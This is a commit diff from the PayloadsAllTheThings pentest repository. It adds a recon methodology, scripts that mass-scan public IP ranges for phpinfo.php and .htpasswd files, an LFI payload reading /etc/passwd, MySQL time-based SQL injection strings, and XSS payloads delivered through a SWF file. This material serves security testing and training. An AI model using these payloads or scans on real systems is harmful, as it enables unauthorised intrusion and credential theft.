mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Methodology added, XSS payloads updated,little fix
This commit is contained in:
parent
22e8dc091f
commit
54bf6d9a5b
1
.gitignore
vendored
Normal file
1
.gitignore
vendored
Normal file
@ -0,0 +1 @@
|
|||||||
|
Low_hanging_fruits.md
|
@ -1,29 +0,0 @@
|
|||||||
# Collection of usefull scripts and tricks
|
|
||||||
|
|
||||||
## Dorks
|
|
||||||
|
|
||||||
Google Dork to find subdomains
|
|
||||||
```
|
|
||||||
site:*.domain.com -www
|
|
||||||
site:http://domain.com ext:php
|
|
||||||
site:http://domain.com filtype:pdf
|
|
||||||
```
|
|
||||||
|
|
||||||
## Scripts
|
|
||||||
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
|
|
||||||
```
|
|
||||||
#!/bin/bash
|
|
||||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
|
||||||
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
|
|
||||||
```
|
|
||||||
|
|
||||||
Script to detect all .htpasswd files in a range of IPs
|
|
||||||
```
|
|
||||||
#!/bin/bash
|
|
||||||
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
|
||||||
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
|
||||||
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
|
|
117
Methodology_and_enumeration.md
Normal file
117
Methodology_and_enumeration.md
Normal file
@ -0,0 +1,117 @@
|
|||||||
|
# Methodology and Enumeration
|
||||||
|
|
||||||
|
## Bug Hunting Methodology
|
||||||
|
1. Enumerate all subdomains (only if the scope is *.domain.ext)
|
||||||
|
Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
|
||||||
|
```
|
||||||
|
git clone https://github.com/guelfoweb/knock
|
||||||
|
git clone https://github.com/danielmiessler/SecLists.git
|
||||||
|
|
||||||
|
knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
Using Jason Haddix's enumall Recon-ng script,
|
||||||
|
```
|
||||||
|
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
|
||||||
|
cd recon-ng
|
||||||
|
pip install -r REQUIREMENTS
|
||||||
|
ln -s /$recon-ng_path /usr/share/recon-ng
|
||||||
|
git clone https://github.com/jhaddix/domain.git
|
||||||
|
cd domain
|
||||||
|
./setup_enumall.sh
|
||||||
|
|
||||||
|
./enumall.py domain.com
|
||||||
|
-w to run a custom wordlist with recon-ng
|
||||||
|
-a to use alt-dns
|
||||||
|
-p to feed a custom permutations list to alt-dns (requires -a flag)
|
||||||
|
-i to feed a list of domains (can also type extra domains into the original command)
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Subdomain take over using HostileSubBruteForcer
|
||||||
|
```
|
||||||
|
git clone https://github.com/nahamsec/HostileSubBruteforcer
|
||||||
|
chmox +x sub_brute.rb
|
||||||
|
./sub_brute.rb
|
||||||
|
```
|
||||||
|
|
||||||
|
3. EyeWitness and Nmap scans from the KnockPy and enumall scans
|
||||||
|
```
|
||||||
|
git clone https://github.com/ChrisTruncer/EyeWitness.git
|
||||||
|
./setup/setup.sh
|
||||||
|
./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
|
||||||
|
./EyeWitness -f urls.txt --web
|
||||||
|
./EyeWitness -x urls.xml -t 8 --headless
|
||||||
|
./EyeWitness -f rdp.txt --rdp
|
||||||
|
```
|
||||||
|
|
||||||
|
4. Basic NMAP (if allowed ^^')
|
||||||
|
```
|
||||||
|
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 &
|
||||||
|
sudo nmap -sSV -oA OUTPUTFILE -T4 -iL IPS.csv
|
||||||
|
|
||||||
|
• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
|
||||||
|
|
||||||
|
• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
|
||||||
|
|
||||||
|
• 192.168.0.1 is the IP address to scan
|
||||||
|
|
||||||
|
• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
|
||||||
|
|
||||||
|
• -T4 defines the timing for the task (options are 0-5 and higher is faster)
|
||||||
|
```
|
||||||
|
|
||||||
|
5. List all the subdirectories with DirBuster or GoBuster
|
||||||
|
```
|
||||||
|
./gobuster -u http://buffered.io/ -w words.txt -t 10
|
||||||
|
-u url
|
||||||
|
-w wordlist
|
||||||
|
-t threads
|
||||||
|
|
||||||
|
More subdomain :
|
||||||
|
./gobuster -m dns -w subdomains.txt -u google.com -i
|
||||||
|
```
|
||||||
|
|
||||||
|
6. Explore the website
|
||||||
|
```
|
||||||
|
- Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
|
||||||
|
- Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
|
||||||
|
- Explore and understand available functionality, noting areas that correspond to vulnerability types
|
||||||
|
```
|
||||||
|
|
||||||
|
7. Look for private information in GitHub repos with GitRob
|
||||||
|
```
|
||||||
|
gitrob commd
|
||||||
|
```
|
||||||
|
|
||||||
|
8. Subscribe to the site and pay for the additional functionality to test
|
||||||
|
|
||||||
|
9. Launch a Nikto scan in case you missed something
|
||||||
|
|
||||||
|
|
||||||
|
## Google Dorks
|
||||||
|
|
||||||
|
Google Dork to find subdomains
|
||||||
|
```
|
||||||
|
site:*.domain.com -www
|
||||||
|
site:http://domain.com ext:php
|
||||||
|
site:http://domain.com filetype:pdf
|
||||||
|
```
|
||||||
|
|
||||||
|
## Scripts
|
||||||
|
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
|
||||||
|
```
|
||||||
|
#!/bin/bash
|
||||||
|
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||||
|
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
|
||||||
|
```
|
||||||
|
|
||||||
|
Script to detect all .htpasswd files in a range of IPs
|
||||||
|
```
|
||||||
|
#!/bin/bash
|
||||||
|
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||||
|
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
|
@ -3,12 +3,13 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
|
|||||||
|
|
||||||
## Exploit
|
## Exploit
|
||||||
|
|
||||||
Basic LFI (null byte and double encoding)
|
Basic LFI (null byte, double encoding and other tricks)
|
||||||
```
|
```
|
||||||
http://example.com/index.php?page=etc/passwd
|
http://example.com/index.php?page=etc/passwd
|
||||||
http://example.com/index.php?page=etc/passwd%00
|
http://example.com/index.php?page=etc/passwd%00
|
||||||
http://example.com/index.php?page=../../etc/passwd
|
http://example.com/index.php?page=../../etc/passwd
|
||||||
http://example.com/index.php?page=%252e%252e%252f
|
http://example.com/index.php?page=%252e%252e%252f
|
||||||
|
http://example.com/index.php?page=....//....//etc/passwd
|
||||||
```
|
```
|
||||||
|
|
||||||
LFI Wrapper rot13 and base64 - php://filter case insensitive
|
LFI Wrapper rot13 and base64 - php://filter case insensitive
|
||||||
|
@ -22,6 +22,7 @@ Last modifications :
|
|||||||
* [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
|
* [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
|
||||||
* [Nikto](https://cirt.net/nikto2)
|
* [Nikto](https://cirt.net/nikto2)
|
||||||
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
|
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
|
||||||
|
* [Wappalyzer](https://wappalyzer.com/download)
|
||||||
|
|
||||||
# More resources
|
# More resources
|
||||||
Book's list:
|
Book's list:
|
||||||
|
@ -76,6 +76,7 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
|||||||
MySQL Time Based
|
MySQL Time Based
|
||||||
```
|
```
|
||||||
+BENCHMARK(40000000,SHA1(1337))+
|
+BENCHMARK(40000000,SHA1(1337))+
|
||||||
|
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
@ -107,5 +108,21 @@ Polyglot injection (multicontext)
|
|||||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to - Other resources
|
||||||
* http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
|
* MySQL:
|
||||||
|
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
||||||
|
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
||||||
|
* MSQQL:
|
||||||
|
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
||||||
|
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||||
|
* ORACLE:
|
||||||
|
- [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
|
||||||
|
* POSTGRESQL:
|
||||||
|
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
|
||||||
|
* Others
|
||||||
|
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
|
||||||
|
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
|
||||||
|
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
||||||
|
- [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
|
||||||
|
- [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
|
||||||
|
- [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
|
@ -136,9 +136,18 @@ XSS in SVG (short)
|
|||||||
```
|
```
|
||||||
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
|
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
XSS in SWF
|
||||||
|
```
|
||||||
|
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
|
||||||
|
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
|
||||||
|
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||||||
|
```
|
||||||
|
|
||||||
more payloads in ./files
|
more payloads in ./files
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## XSS with Relative Path Overwrite - IE 8/9 and lower
|
## XSS with Relative Path Overwrite - IE 8/9 and lower
|
||||||
|
|
||||||
You need these 3 components
|
You need these 3 components
|
||||||
|
Before Width: | Height: | Size: 379 B After Width: | Height: | Size: 379 B |
BIN
XSS injection/files/SWF_XSS.swf
Normal file
BIN
XSS injection/files/SWF_XSS.swf
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user